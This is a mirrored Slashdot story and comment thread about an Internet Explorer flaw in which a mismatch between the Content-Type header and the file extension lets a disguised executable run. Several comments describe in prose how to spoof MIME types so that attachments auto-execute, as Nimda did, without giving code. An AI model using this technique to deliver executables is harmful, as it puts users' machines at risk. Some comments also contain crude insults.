Slashdot Mirror


Another Gaping Microsoft Security Hole Goes Unpatched

Newsbytes has a story about a critical vulnerability in all recent versions of Internet Explorer, which leaves your computer completely open any time you browse the web with IE. Microsoft has known about it since November 19; they refuse to provide any information about when a patch might be made available, if ever. This bug has been successfully handled by Microsoft's "Security through Obscurity" policies - since there's no public notice, Microsoft has no need to actually patch this hole which renders several hundred million computers vulnerable any time they access a web page or parse an HTML email.

For readers who care, this vulnerability results from Microsoft's integration of IE and the operating system. Files received via HTTP are supposed to be handled by examining the Content-Type header sent by the webserver - for instance, the Content-Type sent with this webpage is "text/html", identifying it as a text (non-binary) document which is marked up with HTML.

Netscape and most other browsers have no problem with this.

You will notice, however, that this method is rather different than how a Microsoft operating system determines how to handle a local file - by its three-letter extension. A file named "foo.txt" is handled as a text file, even if it is a binary image file that has been renamed for some reason.

Now, what happens when you integrate your web browser and your local browsing, say to render moot an anti-trust suit filed against your company? Will local files get a Content-Type? Will remote files be handled by examining their file extension?

IE handles files in an odd mish-mash of looking at the Content-Type sometimes for some purposes, looking at file extension sometimes for some purposes. It's hardly surprising that the bug-hunter in the above story has found a way to feed it a Content-Type at odds with the file extension - the Content-Type may be innocuous, but the extension says "execute me", so when the "integrated" IE engine gets ahold of it, the malicious content is automatically executed.

Now Microsoft has a problem. Because they chose to ignore the standard for handling downloaded files, Microsoft has painted themselves into a corner. If Microsoft suddenly changes how their browser handles downloaded files, tens of thousands (perhaps hundreds of thousands? any webpage which downloads files) of webpages "designed for IE" will have to be rewritten. No doubt this is the issue their programmers are wrestling with right now. It's a fundamental design issue - Microsoft designed their web browser with the goal of doing what was best for Microsoft (evading anti-trust charges) rather than doing what was best for their users. In fact a proper "fix" of this hole probably involves de-integrating their browser and local file handling to some extent.

If you routinely browse with Internet Explorer or read mail with Outlook, keep in mind that any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything. This has been true for at least two and half years. And keep in mind that you can't fix the problem, you must rely on Microsoft to do it, if they so choose. And keep in mind that Microsoft is in no hurry to do anything about it, because it doesn't even consider it a vulnerability. Happy browsing!

1,035 comments

  1. other browsers by stew77 · · Score: 0, Flamebait

    I know this sounds like a stupid average comment but...who's using IE anyway? After I found Opera for Windows, I have no desire for another browser at all. Opera has some very useful UI details that make IE look as comfortable as reading web pages with wget | more.

    1. Re:other browsers by mcjulio · · Score: 3, Informative
    2. Re:other browsers by stew77 · · Score: 2, Interesting

      Google toolbar? I do a google search in Opera by entering "g my search words" in the URL field. And once you got addicted to the mouse gestures, you wonder how you could ever live without.

    3. Re:other browsers by Suppafly · · Score: 1

      I do the same thing in IE.. you just have to download a little addon.. and im not talking about the google toolbar.. I can also right click on graphics and zoom in and out on them and right click on a page and get a listing of all the images contain therein or all of the links contained therein.

      the only thing opera has going for it that other browser don't is gesture navigation

    4. Re:other browsers by Anonymous Coward · · Score: 0

      that doesn't necessarly mean IE is the most prefered browser... by default the browser identification in opera defaults to appear as IE 5.0 to web pages

    5. Re:other browsers by sg_oneill · · Score: 2

      And MDI. For me that's always been the clincher. It's nice to be able to be able to organise windows like that.

      --
      Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
    6. Re:other browsers by Anonymous Coward · · Score: 1, Informative

      There are those who don't have the choice all the time. Corporate policy may standardize on IE due it's being "free" with Windows. Nevermind that it means more time for patching or cleanup or tweaking a firewall.

      I like Opera. I use registered Opera at home. But at work.. it's IE. Changing employers over a browser is not a serious option. (Besides, they're finally seeing the light - looking for non Microsoft solutions where they can. The problem is the lock-in of MS proprietary file formats that people use instead of open, documented formats.)

    7. Re:other browsers by stew77 · · Score: 1

      Then you'll like Opera 6 that can run in SDI mode if desired. Hm, and to me there's more than just the gestures, but I don't feel like putting down all of Operas features here. If you're interested in it, go to their website and read for yourself.

    8. Re:other browsers by Hostile17 · · Score: 2


      the only thing opera has going for it that other browser don't is gesture navigation



      Gesture Navigation and it doesn't have the vulnerabilty currently being discussed.

      --
      Fascism should more properly be called corporatism, since it is the merger of state and corporate power - Benito Mussoli
    9. Re:other browsers by Gleef · · Score: 4, Informative

      stew77 asks:

      who's using IE anyway?

      Roughly 85% of people surfing are using Internet Explorer. With computer software, there's alot to be said for "It's preinstalled so I don't have to do anything to get it". Otherwise, I'm positive their share would be much smaller.

      --

      ----
      Open mind, insert foot.
    10. Re:other browsers by Lunastorm · · Score: 2, Insightful

      Those who use IE are probably those who have no reason to switch browsers, and those who visit sites that are "optimized" for IE. There are also those that don't want to use Opera because it has a huge ad banner, and don't want to pay to have it taken away or use an illegal serial number. Let's not forget those who use AOL. :P

      --
      You die too easily.
    11. Re:other browsers by Anonymous Coward · · Score: 0

      I would venture to say that MORE than 80% use IE.

      I have to say out of all of them it is the fastest, most reliable and best browser that I have worked with. Opera is nice, but not that nice.

    12. Re:other browsers by ThatComputerGuy · · Score: 2

      Konqueror also does this, and has quite a few specified by defaut... "gg:" searches google for , for example.

      Others by default are fm: (freshmeat), rf: (rpm-find), dict: (meriiam-webster dictionary), ad: (acronym database), and many other popular search engines. Adding or modifying entries is very simple also; the entry for Acronym Database is 'http://www.chemie.de/tools/acronym.php3?language= e&acronym=\1'.

      --
      XML is like violence. If it doesn't solve the problem, use more.
    13. Re:other browsers by Anonymous Coward · · Score: 0
      Opera's UI has a search bar a la Google Toolbar that sits beside the url field. It can query about 10 search engines and version 6 has dictionaries and thesesaurus etc.

      Of course, I still prefer Konqueror. With it you type a certain prefix and then your search terms, ie, "gg: hot man action" will get the preferred result.

    14. Re:other browsers by wheany · · Score: 2, Informative
      I have to say out of all of them it is the fastest, most reliable and best browser that I have worked with. Opera is nice, but not that nice.
      Hey, Opera isn't called "the fastest browser on Earth" for nothing. Mouse middle-button scrolling combined to mouse gestures make browsing a swooshy experience. I only use IE when a page simply refuses to work with Opera. I think the UI in Opera is extremely intuitive. I know IE has middle-button scrolling as well, but at first it's too slow, and after a certain threshold it scrolls WAY too fast.
    15. Re:other browsers by Darby · · Score: 0, Redundant

      right click on a page and get a listing of all the images contain therein or all of the links contained therein

      Which you've been able to do in Netscape since at least version 3

    16. Re:other browsers by hammock · · Score: 0, Flamebait

      No, it's because it is bundled with Windows.

      The Internet = Internet Explorer to every single Windows user.

      IE may be (in your opinion) the best browser right now, and that is because Microsoft (intentionally) destroyed all development of any other browser using anti-competitive tactics as determined by a court of law.

      Using IE is immoral and unacceptable, I just with the American justice system enforced the law on Microsoft instead of letting them extend thier monopoly into schools as a "punishment" while giving them billions of dollars worth of tax credits.

    17. Re:other browsers by WhiteKnight07 · · Score: 2, Informative

      Mozilla has gestures as well.

      --


      We're going to make information free Mr. Anderson, whether you like it, or not.
    18. Re:other browsers by Anonymous Coward · · Score: 0

      All CMU students, check out this and be sure to show up!

    19. Re:other browsers by Anonymous Coward · · Score: 0

      Well, I've seen more than one browser that's faster than Opera.

    20. Re:other browsers by vegardolsen · · Score: 1

      I love Opera and it's mouse gestures. Sometimes I have to use IE to acces some shity webpages, and i often try to use the gestures because I'm so used to it, and when I realise that I'm running IE, I shit my pants. I LOVE OPERA!!

      --
      Sig e godt =)
    21. Re:other browsers by Console · · Score: 1

      You can make IE scroll properly for a sane person by disabling "Use smooth scrolling" (Tools-options-advanced).

      That was the easy part. Figuring out why it's called "Smooth scrolling" is a different matter entirely...

    22. Re:other browsers by jaavaaguru · · Score: 1

      The people that you are talking about are probably the portion of the community who do not realize there are any problems involved in using MSIE or Outlook. They probably consist of a lot of people who "catch" e-mail worm/viruses. They do not realize there is anything to be worried about and don't recognize that anything is wrong until it is too late. These are the people who have the most need to switch browsers - although they do not realize it. And when things do go pear-shaped, they will probably just accept it and pay their local computer store to re-install windows (or however people go about fixing these things). They'll probably also spash out on buying the lastest whizz-bang virus detection suite, and then be struck down again the next time terroritst release a new worm, before they update their virus definitions (or even know that virus definitions are for that matter) or when the next MSIE security flaw is realized by the wrong-doers. To say that these people have no reason to switch is simply making matters worse. Not forgetting the evil things that MSIE does that cause web developers to learn lots of non-standard things.

    23. Re:other browsers by sxpert · · Score: 1

      Or those (like me) whose company use MS Proxy with the proprietary NTLM authentication

    24. Re:other browsers by brain159 · · Score: 1
      cheap "my program" plug at this point - windows users can get this sort of behaviour and more in a lovely browser-agnostic and browser-independant (as in "don't have to change to your browser to start searching") way with Flarp!Bar.

      It's free-as-in-beer (come off it, do you really want to read my dodgy VB source? no, you're just going to flame me for using my favourite language <G>) and hugely configurable. Due another release with improvements to the help file in a few days, but should be good enough for /.ers as it is currently.

    25. Re:other browsers by giberti · · Score: 1

      According to my site logs at work (a large environmental organization), about 88% of all traffic we see (1 million unique visitors / month) are using ie 4.0 and above.

      Our demographic is home and k-12 users primarily, so I think its safe to assume, any almost any non-tech person is using it.

      Incidently, due to security issues, we use Netscape 4.77 internally!

      --

      AF-Design, web development.
    26. Re:other browsers by drsquare · · Score: 1, Informative

      And it isn't braindead enough to open a new main window just for each page you open.

      And it makes it as easy as possible to turn on/off javascript/java/images.

      And navigating the config isn't slow as fuck.

      And it doesn't keep the history and cache in secret cryptic directories.

      And it has a separate window dedicated to downloading files, so you don't have a little pop-up window for every downloading file cluttering up the place.

      And when a download breaks you can select "resume".

      Opera kicks the shit out of IE in every factor save price.

    27. Re:other browsers by kent_eh · · Score: 1

      Precicely. I'm using IE right now, because my company won't let me change the software that's installed on my workstation.

      Yes it's draconian. Yes it sucks. No I can't do anything about it.

      Of course, my Windows box at home has Netscape on it

      --

      ---
      "I can't complain, but sometimes still do..." Joe Walsh
    28. Re:other browsers by Anonymous Coward · · Score: 0

      mozilla has gesture navigation!

    29. Re:other browsers by sdo1 · · Score: 1

      And in reality it's probably much higher than that since their statistics come from people who visit browserwatch.internet.com. People who visit that site are probably slightly more technically astute than the average computer user and therefore are more likely to be using something other than IE. I would guess that the average across all sites is something above 90%.

      -S

      --
      --- What parts of "shall make no law", "shall not be infringed", and "shall not be violated" don't you understand?
    30. Re:other browsers by Computer! · · Score: 1

      These are the people who have the most need to switch browsers[...]

      Uh, why? Not everyone cares as much about their computer as you do. Even when infected with a virus, they're unaware of any problem. They expect their computer to "lose" things, or suddenly reboot. Just like people who refuse to change their oil have to buy new cars every couple of years. Granted, someone could take over their machine to use it to launch DoS attacks or worms, but assuming you use Linux, or have up-to-date security patches, you are again unaffected. Except for maybe a small loss of bandwidth.

      To say that these people have no reason to switch is simply making matters worse.

      No, it's just accepting reality. Were these lusers to switch to another platform, they would just bring all of these problems with them. Does the Linux community really need 150 million soccer moms? Are you prepared for the hand-holding required of a free software community. You might be willing to write software for free, but who's going to give out free tech support for FreeAOL?

      Not forgetting the evil things [slashdot.org] that MSIE does that cause web developers to learn lots of non-standard things.

      Give me a break. Try writing something like BLOX for use in Netscape.

      --
      If you fall off a building, go real limp, because maybe you'll look like a dummy and people will be like hey, free dummy
    31. Re:other browsers by Condor7 · · Score: 1


      For some bizarre reason, Opera comes configured to identify itself as MS IE 5.0 so your statistics are not accurate.

    32. Re:other browsers by edibleplastic · · Score: 2
      With computer software, there's alot to be said for "It's preinstalled so I don't have to do anything to get it". Otherwise, I'm positive their share would be much smaller.

      Nevermind the fact that IE is one of the best browsers out there. It helps when you actually keep adding functionality and streamlining your to your browser, rather adding bloat and commercial addons. I stopped using Netscape as soon as it was clear that there were no significant advances since 4.7 and that they were more concerned with adding a special AIM button to their browser rather than fixing their HTML implementations. Sure, being preinstalled helps, but all in all, IE is a *much* better browser than Netscape (not to mention being the most w3c-compliant browser for the Mac). Microsoft may not have won the browser market fairly, but that doesnt take away from IE's strength.

    33. Re:other browsers by TCaptain · · Score: 1

      those that don't want to use Opera because it has a huge ad banner

      Oh COME ON...a banner that's about an inch by 5 or so is HUGE?..its not even in the viewing area! Besides, you can always just BUY the registered version...or find a crack..I'm sure there's one out there

      Personally I switched to Opera when 5 came out and now I've moved up to 6 and I have to say its a really good browser, nice and stable, FAST and once you lie to some webpages (ie: make Opera say its MSIE 5) they all come out beautiful...

      --
      "I'm not a procrastinator, I'm temporally challenged"
    34. Re:other browsers by Trogre · · Score: 1

      IE? Standards compliant?

      I guess you've never tried Mozilla

      Please don't say IE is the best if you've only tried the abomination that is Time Warner/AOL/Netscape/Mirabilis/Whoever Navigator

      --
      "Nine times out of ten, starting a fire is not the best way to solve the problem." - my wife
    35. Re:other browsers by edibleplastic · · Score: 2

      Never said IE is the best. I certainly agree that other browsers are either more compliant or are working towards getting there. I'm merely saying that IE has its own merits, and deserves its lead ahead of Netscape.

    36. Re:other browsers by Anonymous Coward · · Score: 0

      Are they IE? You damned skippy.

      Opera is pure, unadulterated, substandard crap. It really sucks, both in development and in deployment. It's compatibility with even the most commonly accepted standards is awful.

      As to people not using IE if it wasn't pre-installed, dream on. IE has it's faults, and needs a facelift of sorts, but compared to all but the latest release of Netscape (too little way too late netscape) and ALL other browsers, it is really the ONLY way to go. It's fast, agile, compliant, and can handle badly coded web pages far better than any other browser available. People are not entirely stupid, they would certainly download it after a few frustrating sessions with Nutscrap.

    37. Re:other browsers by lhand · · Score: 2

      Who uses IE? Pretty much anyone who uses Windows.

      Remember, IE is linked deepely into the user interface. Active desktop uses IE. Windows help uses IE. Outlook uses IE. Office uses IE. Explorer uses IE. Scads of programs written by third parties use IE. Even if you have Netscape (or other) as your Internet browser of choice, you can be sent to a web page using IE as the browser by any program that wants to.

      And all of those IEs are Internet-aware.

      Yes, bringing up the help page on a program you downloaded (without even opening the program, mind you) could send you off, running IE, to a web page with this exploit on it.

    38. Re:other browsers by decaying · · Score: 1

      I hounded the sysadmins until they changed it.

      It is still the MS Proxy using the domain to authenticate, but not it will also accept basic authentication.

      I can now use Opera/Mozilla/Netscape plus the numerous array of other 'internet aware' apps, such as Audiocatalyst (for CDDB access), United Devices (Distributed processing) and of course Lynx on my Linux Box.

      --
      ----- One piece short of Legoland
    39. Re:other browsers by Trogre · · Score: 1

      My apologies - you had said that IE is *one of* the best browsers out there.

      .
      .

      --
      "Nine times out of ten, starting a fire is not the best way to solve the problem." - my wife
    40. Re:other browsers by eggfellow · · Score: 1

      You can also run ad-filter stuff. WebWasher removes at least half of the ads that (try to) show up

    41. Re:other browsers by geekoid · · Score: 2

      not 85% of people surfing, 85% of peaop who visit that site. Mostly trade people, or people looking for a fact to put in the story, which means media outlets, most of them use IE.

      This only detects what browsers say they are.

      I would take a grain of salt with these "facts".

      Now if there was a program that sites could sign up with that gathered these stats, then submited the results of the individule sites to an orginization that putds them together, you might begn to see a number that you can realy on.

      --
      The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
    42. Re:other browsers by stonecypher · · Score: 1

      > Give me a break. Try writing something like BLOX [blox.com] for use in Netscape.

      (sighs)

      Have we forgotten that the web is supposed to be browser-blind?

      But, look, if you really need to use a web browser to do things that a web browser just wasn't meant to do, you ought to consider funky little things like Java.

      Java works on many platforms, including the PlayStation Fucking Two. And it can do everything blox will be doing until its shutdown in a few weeks.

      There's a reason IE is breaking the web. It's in Microsoft's best interest. Quit being another one of MS' brainwashed sheepole and wake up.

      (I don't mindlessly MS bash, by the way. It's quite planned. Now I'm going to go pretend like I don't use office.)

      --
      StoneCypher is Full of BS
    43. Re:other browsers by askwar · · Score: 1

      > and can handle badly coded web pages far better than any other browser available.

      You know what? THAT is exactly one of the reasons, why IE is so bad! It handles HTML wrong and thus displays pages wrong. If I "forget" to close a table tag, than I might do this on purpose, and I actually do not want the browser to "correct" (ie. break) this.
      --
      Alexander Skwar -- Homepage: http://www.digitalprojects.com | http://www.iso-top.de iso-top.de - Die
    44. Re:other browsers by Computer! · · Score: 2

      Have we forgotten that the web is supposed to be browser-blind?

      Says who? Oh, right, the W3C. Their standards process is too slow, and Netscape hasn't even got their browser supporting those standards. Java on the client is slow, buggy, and a lot harder to write/compile/deploy than javascript.

      Java works on many platforms, including the PlayStation Fucking Two

      Your definition of "works" has to be pretty loose. The MacOS virtual machine is a dog. Sun uses Java as a litigation tool like a pissed-off Scientologist. Putting applets in your web pages seems like a great idea, until you realize it's not 1996, Java on the client sucks, and 80% of people use IE anyway.

      There's a reason IE is breaking the web.

      IE isn't "breaking" shit. Web pages load faster, do more, and look better in their browser. This is because web developers request new features from Microsoft, and then Microsoft builds them in. If content providers didn't build IE-friendly web pages, this wouldn't be an issue, but it is, because IE is easier to code for and more powerful than Netscape.

      Quit being another one of MS' brainwashed sheepole and wake up

      Microsoft makes my job easier. Netscape makes it harder. My job is how my kids get food. Some things are more important than who's "breaking" the web. Put down Adbusters for a second and take a look around you. That green paper your mom gives you all the time, that's money.

      ---

      --
      If you fall off a building, go real limp, because maybe you'll look like a dummy and people will be like hey, free dummy
    45. Re:other browsers by njdj · · Score: 1

      IE... is the fastest, most reliable and best browser that I have worked with.

      Did you read the article that this thread is about?

      Do you have difficulty ... no, let's start again .. Is it hard for you to read?

  2. Let's see.. by Anonymous Coward · · Score: 1, Troll

    You either get a warning that something is about to execute on your machine or you are prompted to download the file you just clicked on.

    Sounds like a gaping hole to me.

    Jeez, how about some perspective here?

    1. Re:Let's see.. by strAtEdgE · · Score: 0, Flamebait

      Read the article, retard. It bypasses download security. Blind faith in microsoft... could you be any stupider?

      --
      ----- sXe
    2. Re:Let's see.. by Anonymous Coward · · Score: 0

      The article is pure hype. There is no such thing as 'autoexecute'. There are no, none, zip, zilch, nada examples of this exploit in the wild.

    3. Re:Let's see.. by Cuthalion · · Score: 0, Flamebait

      Read the article, retard. It still asks you if you want to open or save the file. Save is safe.

      --
      Trees can't go dancing
      So do them a big favor
      Pretend dancing stinks!
    4. Re:Let's see.. by Anonymous Coward · · Score: 0

      You either get a warning that something is about to execute on your machine or you are prompted to download the file you just clicked on. Sounds like a gaping hole to me.

      That depends who's using the computer: me (tho I usually use mozilla), or my sister/mother ("It popped up some weird window, and I forgot what you said to do so I just clicked 'ok'.")

    5. Re:Let's see.. by silicon_synapse · · Score: 2, Informative

      But the file is identified as file.txt or whatever. There's no indication that it's an executable file. Done properly, this could fool any IE user.

    6. Re:Let's see.. by Anonymous Coward · · Score: 1

      No moron, the extension is .EXE. The HEADER says its a text file. It would still be called file.exe

    7. Re:Let's see.. by Anonymous Coward · · Score: 0

      Get a clue. Link says "readme.txt", save fail dialog box says "readme.txt", but browser can be made to download and run an executable - this is a huge hole!

    8. Re:Let's see.. by VividU · · Score: 1

      IE will not launch any file with a .EXE extension without first asking for permission.

    9. Re:Let's see.. by smash · · Score: 2, Informative

      the problem is that someone can tell your browser (via header information) that the file you are downloading is named (for example) "blah.txt", and actually send you "virus.exe".

      IE prompts the user to open/download blah.txt - most people would click "open", and it then spawns the downloaded virus.exe.

      the correct filename is displayed once you get to the "save as" box, however most people would just open .txt files (for example) without bothering to click "save".

      there are conflicting reports that ie 6 may/may not be vulnerable - the latest is that if you did a minimal install over the top of ie5, it may be (due to the fact that it didn't replace certain components of IE5.x)..

      --
      I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
    10. Re:Let's see.. by DeadMeat+(TM) · · Score: 5, Insightful

      Unless you combine it with the fact that IE is set up to automatically execute certain MIME types (like audio/x-wav). Send a message with an attached .EXE file, but hack up the message so the MIME type reads something else, and -- presto! -- instantly executing attachments. That's one of the attacks Nimda used.

    11. Re:Let's see.. by Fesh · · Score: 4, Informative

      IE won't launch a file that is declared as a .EXE by the HTML header without asking permission. What we're saying here is that IE doesn't check the TLE of the file it downloads, just the type declared in HTML. So IE thinks it passed a text file to the OS, and doesn't pop a warning of a possible malicious executable.

      However, once the OS gets a hold of it, it looks at the TLE and says, "Executable! Gotta run it!" And if the code slags your hard drive, you're just SOL.

      --
      --Fesh
      Kill -9 'em all, let root@localhost sort 'em out.
    12. Re:Let's see.. by OblongPlatypus · · Score: 2

      I think you mean HTTP, not HTML.

      --
      -- If no truths are spoken then no lies can hide --
    13. Re:Let's see.. by Anonymous Coward · · Score: 1, Interesting

      NIMBA got IE users to autoexecute it by munging the content-type header to say audio/x-wav and then sending a .exe file. IE would happily start 'playing' the file for you.

      OOPS.

    14. Re:Let's see.. by gkbarr · · Score: 1

      If this is accurate, than somebody mod it up. Well explained. Sounds like /.ers will be downloading Netscape soon.

      --
      Sapere Aude - Homer
    15. Re:Let's see.. by SkepTech · · Score: 0

      I'm afraid you'll have to cite an instance where this has happened.

      This whole discussion is extremely hypothetical.

      You folks discredit yourselves by playing pretend-vulnerability when you don't have evidence to back up your claims.

    16. Re:Let's see.. by ColaMan · · Score: 4, Interesting

      Funnily enough I got one that did this just this morning.... but my procmail filter cleaned it up nicely. Note the original content type below.

      > SECURITY WARNING!
      >
      > The mail system has detected that the following
      > attachment may contain hazardous program code, is
      > a suspicious file type, or has a suspicious file name.
      > Do not trust it. Contact your system administrator immediately.
      >
      > X-Content-Security: [www.ccimackay.com] original Content-Type was audio/x-wav;
      > Content-Type: application/octet-stream; name="HUMOR.MP3.27525DEFANGED-scr"
      > Content-Transfer-Encoding: base64
      > Content-ID:
      >

      Another case of security vs convenience I suppose.

      --

      You are in a twisty maze of processor lines, all alike.
      There is a lot of hype here.
    17. Re:Let's see.. by BiffJerky · · Score: 0, Funny
      ** Windows has detected a mouse movement.

      ** Please restart Windows so changes can take effect

      Linux has detected a 1997 device. Please recompile your kernel with the correct command line options so changes can take effect.

      --

      Love And Kisses,

      BiffJerky the Troll

    18. Re:Let's see.. by jrockway · · Score: 1

      Hey, could you post the procmail filter? It looks really cool :-)

      --
      My other car is first.
    19. Re:Let's see.. by Huip · · Score: 2, Insightful

      The most anoying part is the fact that IE pops up to open readme.txt, but executes readme.exe, _this_ should never happen.
      If IE ask permission to open some file with notepad, it should be opened with notepad, and nothing else.
      If IE finds out it would rather open the file with run.dll (afterwards) , fine, but _ask me_, goddammit.
      I really hate this 'ask once, do whatever I like' behaviour in M$ products

    20. Re:Let's see.. by Elwood+P+Dowd · · Score: 2, Insightful

      Hrm. I thought that they were saying that the method of execution is determined by the type (audio/x-wav in this case) and the displayed name is determined by the filename. This would mean that if they sent you an .exe as audio/x-wav it would attempt to play the executable as audio. Just ugly noise, no security problem.

      Don't get me wrong, I think this is a big problem, but I think it's different than you describe.

      --

      There are no trails. There are no trees out here.
    21. Re:Let's see.. by dildofire · · Score: 1

      why doesn't somebody just set up a site exploiting this vulnerability, and we'll find out for sure if IE will execute without prompting or if this whole article is just hype?

      shit, i'm using IE. i'm a brave man. i'll be the first to try it out.

    22. Re:Let's see.. by jaavaaguru · · Score: 1

      Maybe you should try it yourself before stating things like that. IE will quite happily run "erasemyharddisk.bat" as long as it's Mime type says it is something that IE doesn't usually ask about. Maybe not so much in IE, but with Outlook if a file is attached with, say, an image/jpeg Mime type and it's called mypic.jpg.exe and the .exe is hidden by Windows, Outlook will think it's an image and pass it onto the OS to process, without asking. The OS then ignores the Mime type and runs the executable. I bet you wish Windows used mime-magic type stuff instead of just assuming a file is what it says it is.

    23. Re:Let's see.. by Tony-A · · Score: 1

      The code for the asking and the running were done by different departments, which don't really have much to do with each other. BTW, "ask permission to open some file with notepad" is NOT what it is asking. It is asking if you want to open the file, with a non-definitive icon that might relate to the file type.

    24. Re:Let's see.. by cs668 · · Score: 1

      The bizar thing is tat you could have your .exe open notpad with some bogus content after you had infected the computer. Then no one would have any clue that they had been infected.

    25. Re:Let's see.. by Anonymous Coward · · Score: 0

      I've never posted here, but I've read the site for several years now, and I have to say this: this is an excellent site for information and views both alike and dislike my own. However, in the last several months or so, it seems like any possible objectivity /. may have is gone. I don't think this is flamebait, and I think I can figure out Microsoft is dishonest and lazy without sideways comments in the title and every other sentence. If this continues, this site might as well be a Linux PR Machine acting as polar opposite to Microsoft.

    26. Re:Let's see.. by Deven · · Score: 2

      I have little doubt it's being exploited -- I've received several mystery emails with apparent "WAV files" in them. Since I'm using Pine under Linux, it's not being executed, but when I save the file and look at it with "less", this supposed audio file contains the text "This program requires Microsoft Windows." Obviously it's a Windows executable, and why else would I receive it tagged as an audio file unless that would exploit a bug to allow an executable to run instead of playing an audio file?

      --

      Deven

      "Simple things should be simple, and complex things should be possible." - Alan Kay

    27. Re:Let's see.. by Anonymous Coward · · Score: 0

      Can I send you an email?

    28. Re:Let's see.. by Anonymous Coward · · Score: 0

      You only get prompted if the download violates security settings that have been previously set in IE. If the settings are low, you're fucked. I'm not exactly sure what the default permissions are but due to the fact that it's M$, I would be willing to bet that it's low.

    29. Re:Let's see.. by Anonymous Coward · · Score: 0

      you obviously havn't looked at how nimba works. A friend of mine was looking through his apache logs an found an ip that hit him with nimba. He decided you look at the site http:// well, it opened up the index.htm file, and that file opens up readme.wav. The catch is that the header on readme.wav is content-type:audio/wav with filename:readme.exe. When windows gets a hold of it, it says. Oh! an executeable, I'll just run this. no warning, no nothing.

    30. Re:Let's see.. by gpinzone · · Score: 1

      Can you create a harmless example of this and post it on a webserver? I'd be interested in seeing how this works. That is, unless you are just guessing how it works without actually trying it.

    31. Re:Let's see.. by stonecypher · · Score: 1

      > IE will not launch any file with a .EXE extension without first asking for permission.

      No, but up until version 5, it would run with quite a few other inderect executables.

      My favorite was always .SCR - teh screensaver extension - because under Windows, screensavers are just executables with a specific command line argument format.

      --
      StoneCypher is Full of BS
    32. Re:Let's see.. by Anonymous Coward · · Score: 0

      It's a fairly extensive email security package.

      http://www.impsec.org/email-tools/procmail-secur it y.html

    33. Re:Let's see.. by Anonymous Coward · · Score: 0
      It's part of a fairly extensive email security package.

      http://www.impsec.org/email-tools/procmail-securit y.html

    34. Re:Let's see.. by Jeff_Hagen · · Score: 1

      Well,

      Not that I know much about hacking, but you could convince IE that your HTML page should be executed... It does not popup with a choose box for every type of file.

  3. Anyone have the specifics on this? by mcjulio · · Score: 1

    I find it disturbing that the ones who made the exploit public are only revealing the details under NDA. It's not like this is a secret to those who would use it for malicious purposes. Sigh...

    1. Re:Anyone have the specifics on this? by CmdrPinkTaco · · Score: 2, Interesting

      Hmm, this article seems a little light on details. To me (very much not a know it all) it sounds like it is an exploit in the MIME type headers for a page - if that's the case is IE really the only one that can be exploited or does it lie more in the way that IE handles MIME type headers?

      More detail would be nice. (and no, I don't want to know more abou tit so I can exploit, just so that I can learn from it and other's mistakes)

      --
      Please give your mod points to others, Im at the cap. They will appreciate it more
    2. Re:Anyone have the specifics on this? by Anonymous Coward · · Score: 0
      I 'm posting this as anonymous for reasons which will become clear. As students in computer science we got this funny project: "design a web server that hacks up the professor's PC". When I heared the assignment, I thought "shear fun !!". And it was, until the moment I realized how dangerous it was to even just connect to the internet with Wintels with no firewalls in between ... This project really opened my eyes.


      BUT to the point. My friend and I (mostly my friend actually) have found a way to just upload any executable content to a IE client and run it WITHOUT ANY USER INTERACTION. I stood perlex to see such thing actually working.


      I will not reveal details yet (I still have to get my grades on it ;-) ) and I don't know if I ever will. Luckyly, IE6 does not have this vurnability anymore, but I 'm sure a little effort could make it work there to.


      The most dangerous thing about this one is, that you do not have to count on a user's stupidity to get you exe to run on it's machine. In times of homebanking and visa, this exploit really poses a threat, don't you think?


      What I hate most about Microsoft is that they don't care about their customers, they care about their money only. It's sad.


      Maybe more details soon (and off course a working example ;-) )

      carlo

  4. same ol, same ol by doooras · · Score: 1

    this seems to be a recurring theme... microsoft releases software, it has holes. maybe the problem isn't with the software, it's with the script kiddies wreaking havoc by exploiting them.

    1. Re:same ol, same ol by Anonymous Coward · · Score: 0

      Sure we can blame it on the script kiddies, but really why won't microsoft just fix their bugs?

    2. Re:same ol, same ol by Anonymous Coward · · Score: 0

      I'd have to disagree with you. If not for the "script kiddies", all code would be insecure. We need the belligerent assholes like script kiddies to point things out to us so that we can fix them. Script kiddies are like a disease: no one likes them but at least they weed out the population. (Of buggy software in this case rather than people)
      Of course, if they were true white-hats instead of black-hts that'd be nice, but you can't ask AIDS to only "hurt" you. It's all or nothing; some people take pleasure in the misery of others. It's called human nature. Get used to it

    3. Re:same ol, same ol by crumbz · · Score: 1

      Yes, all software has bugs and holes. But Microsoft's policy of refusing to acknowledge the problem in the first place is disturbing. The security through obfuscation is not a valid policy. There is an old Russian saying that applies to nuclear arms control and here as well.
      "Trust but verify."

    4. Re:same ol, same ol by Anonymous Coward · · Score: 0

      And *maybe* you need to eat a big bag of shut-the-fuck-up. Your post is about as useful as tits on a nun. I really wish that pre-adolescent bags of shit such as yourself that would suck poopy dick for karma points would stop polluting this forum with such inane trivial waste.

  5. Now that this particular cat is out of the bag... by TellarHK · · Score: 3, Interesting

    We'll see plenty of coverage within the next 48 hours, Microsoft statements by the end of tomorrow, and a bugfix by month's end. The big question is going to be, how will people cope in the midst of it all? Will this kind of lagtime offer virus creators to do a whole world of damage? Considering how things have spread recently, I wouldn't be surprised at all if they did. Might be time to start browsing with my iBook more often.

    What kind of steps can people use to protect themselves now, is there any kind of toggle or security setting that can be turned on in IExploiter 5.0(tm) to keep us a little bit safer?

  6. Negligence? by joeb2001 · · Score: 3, Redundant

    I have a very basic understanding of the law, and I am wondering if MS could be sued for negligence.

    --
    -- "I'm open to falling from grace"
    1. Re:Negligence? by Phil+Wherry · · Score: 1

      I've wondered the same thing: does Microsoft have any liability here? I'm sure their end-user license agreements contain lots of language absolving them of any responsibility whatsoever, but what about the damages to the innocent bystanders who aren't party to the click-wrap license? My suspicion is that there's no way they could be successfully sued for this, but it wouldn't hurt my feelings to see someone try.

    2. Re:Negligence? by dsb3 · · Score: 1

      Incorrect. If someone's going to make a landmark legal case against microsoft for something like negligence they'd better darn well be sure they'll have good chances of winning.

      To set a bad precendent would be foolhardy, more so if the only reason for trying was "gee, folks, let's give this a go?"

      --

      Slashdot? Oh, I just read it for the articles.
    3. Re:Negligence? by burtonator · · Score: 2

      No they don't!

      You DO read your EULA don't you??? :)

      They claim NO WARRANTY on the software you use.

